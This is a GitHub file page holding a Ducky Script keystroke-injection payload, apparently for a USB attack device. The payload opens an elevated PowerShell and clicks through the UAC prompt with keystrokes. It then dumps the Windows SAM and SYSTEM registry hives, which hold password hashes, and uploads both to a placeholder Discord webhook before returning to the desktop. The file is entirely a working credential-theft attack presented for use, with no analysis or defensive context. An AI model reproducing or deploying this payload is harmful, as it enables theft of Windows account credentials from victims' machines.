-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathDS1_version.txt
15 lines (15 loc) · 1022 Bytes
/
DS1_version.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
DELAY 750
WINDOWS d
DELAY 1000
WINDOWS r
DELAY 1000
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 3000
LEFTARROW
ENTER
DELAY 3000
STRING C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close()
ENTER
DELAY 500
WINDOWS d